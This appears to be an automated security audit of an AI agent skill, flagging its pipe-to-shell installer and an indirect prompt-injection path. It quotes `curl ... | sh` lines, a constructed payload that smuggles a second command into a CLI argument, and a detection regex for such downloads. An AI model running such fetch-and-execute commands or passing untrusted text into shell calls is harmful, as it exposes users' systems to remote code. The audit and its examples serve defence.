ai-content-pipeline
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICAL
REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [Remote Code Execution] (CRITICAL): The skill instructs the agent to run `curl -fsSL https://cli.inference.sh | sh`. This is the classic pipe-to-shell pattern: an unverified script is downloaded and executed directly by the system shell, with no checksum, signature or review step in between. `-L` follows redirects, so the script may ultimately come from a host other than the one named, and whatever the server returns at install time runs with the agent's privileges; a later change to the hosted script is invisible to anyone who installed earlier. The domain 'cli.inference.sh' is not within the Trusted External Sources scope.
- [Indirect Prompt Injection] (HIGH): The skill is designed to ingest and process untrusted external data (e.g., `<blog-content>` in the Blog to Video Pipeline) and interpolate it into subsequent tool calls.
  * Ingestion points: external data sources such as blog posts and user-provided script texts.
  * Boundary markers: none identified; untrusted content is interpolated directly into command arguments.
  * Capability inventory: the agent is permitted to run any `infsh` command via `Bash(infsh *)`.
  * Sanitization: no sanitization or validation of input data is performed before it is used in CLI commands.
- [Command Execution] (MEDIUM): The skill grants broad permissions for the `infsh` CLI tool. This allows complex operations, including network interactions and media processing, which, if hijacked, could be used for malicious purposes within the agent's environment.
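The injection path described in the Indirect Prompt Injection finding, as an added example that is not part of this audit or of the ai-content-pipeline skill. A constructed blog body closes the quoted argument and appends its own command; the vulnerable builder interpolates it into a command string the way the finding describes, while the hardened builder passes it as a single argv element. `infsh` is replaced by a shell function that echoes its arguments one per line (the real CLI is not installed here and its flags are not modelled; `run blog-to-video --script` is an assumed placeholder), so the two outcomes can be observed offline:

```python
import shlex
import subprocess

# Shell prelude defining a stand-in `infsh` that prints each argument it
# receives on its own line, so we can see how many arguments the tool got.
# Assumption: the real infsh CLI is not installed and its flags are not modelled.
FAKE_INFSH_PRELUDE = 'infsh() { printf "%s\\n" "$@"; }; '

# Constructed untrusted input: a blog post whose body closes the quoted
# --script argument and appends its own commands. `echo INJECTED` stands in
# for whatever an attacker would actually run with the agent's privileges.
MALICIOUS_BLOG = 'Ten tips for better video."; echo INJECTED; echo "'


def build_vulnerable(blog_content: str) -> str:
    """Interpolates untrusted text straight into a shell command string.

    This mirrors what the audit flags: no boundary markers and no quoting,
    and the string is then handed to a Bash(infsh *) tool. The subcommand
    `run blog-to-video --script` is an assumed placeholder, not a real flag.
    """
    return f'infsh run blog-to-video --script "{blog_content}"'


def build_hardened(blog_content: str) -> list[str]:
    """Builds an argv list instead of a command string.

    Every element is exactly one argument, so shell metacharacters in the
    blog body cannot terminate the argument or start a second command.
    """
    return ["infsh", "run", "blog-to-video", "--script", blog_content]


def run_via_shell(command: str) -> list[str]:
    """Runs a command string under /bin/sh with the stand-in infsh defined.

    Returns stdout split into lines: one line per argument the stand-in saw,
    plus any output produced by injected commands.
    """
    result = subprocess.run(
        ["sh", "-c", FAKE_INFSH_PRELUDE + command],
        capture_output=True, text=True, check=False,
    )
    return result.stdout.splitlines()


def run_vulnerable(blog_content: str) -> list[str]:
    return run_via_shell(build_vulnerable(blog_content))


def run_hardened(blog_content: str) -> list[str]:
    # shlex.join quotes each argv element so the shell reconstructs the same
    # list; this is the string a Bash(infsh *) tool should receive.
    return run_via_shell(shlex.join(build_hardened(blog_content)))


if __name__ == "__main__":
    print("vulnerable:", run_vulnerable(MALICIOUS_BLOG))
    print("hardened:  ", run_hardened(MALICIOUS_BLOG))
```

In the vulnerable run the stand-in receives a truncated script argument and the shell then executes `echo INJECTED` as a separate command; in the hardened run the whole blog body arrives as one argument, metacharacters included. Quoting removes the shell breakout but not the prompt-injection risk itself: an agent that reads `INJECTED`-style instructions out of the blog text may still choose to issue a harmful `infsh` call, which is why the finding also lists the missing boundary markers and the breadth of `Bash(infsh *)`.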
Recommendations
- CRITICAL: Downloads and executes remote code from untrusted source(s): https://cli.inference.sh - DO NOT USE
- AI detected serious security threats
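The check a practitioner performs instead of piping an installer into `sh`, as an added example that is not part of this audit: save the script to a file, compare its SHA-256 against a digest pinned from a copy that was actually read, and refuse scripts that themselves pipe further downloads into an interpreter (a pin on the outer script says nothing about a second stage it fetches). The installer bytes and the pinned digest below are constructed so the example runs offline; nothing about the real cli.inference.sh script is assumed, and this does not change the DO NOT USE recommendation above:

```python
import hashlib
import re

# Constructed installer script standing in for what `curl -fsSL https://cli.inference.sh`
# would return. Assumption: this is NOT the real script; it exists so the example
# runs offline, and it deliberately contains a second-stage pipe-to-shell.
SAMPLE_INSTALLER = b"""#!/bin/sh
set -e
echo "installing infsh"
curl -fsSL https://example.invalid/stage2.sh | sh
"""

# A downloaded resource piped into an interpreter inside the script: the same
# pattern one level down, which a digest pinned on the outer script does not cover.
PIPE_TO_INTERPRETER = re.compile(
    rb"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(sh|bash|zsh|python3?|perl)\b"
)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Digest an operator pins after reading a known-good copy of the script. It is
# derived from the constructed bytes above only so the example is self-contained.
PINNED_SHA256 = sha256_hex(SAMPLE_INSTALLER)


def nested_pipe_to_interpreter(script: bytes) -> list[str]:
    """Returns each line of the script that pipes a download into an interpreter."""
    return [
        line.decode("utf-8", "replace")
        for line in script.splitlines()
        if PIPE_TO_INTERPRETER.search(line)
    ]


def review_installer(script: bytes, pinned_hex: str) -> dict:
    """Decides whether a fetched installer may be executed.

    Both gates must pass: the bytes must equal the reviewed digest, and the
    script must not itself fetch and execute further unpinned code.
    """
    digest_ok = sha256_hex(script) == pinned_hex.lower()
    findings = nested_pipe_to_interpreter(script)
    return {
        "digest_ok": digest_ok,
        "nested_pipe_to_interpreter": findings,
        "execute": digest_ok and not findings,
    }


if __name__ == "__main__":
    print(review_installer(SAMPLE_INSTALLER, PINNED_SHA256))
```

Here the digest matches, yet `execute` is still false because the script fetches a second stage the pin does not cover; the operator has to review and pin that stage too, or reject the installer. The regular expression is a heuristic for review, not a sandbox: a script can obscure the pattern (variables, `eval`, base64), so a clean scan is a reason to keep reading, not a reason to run.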
Audit Metadata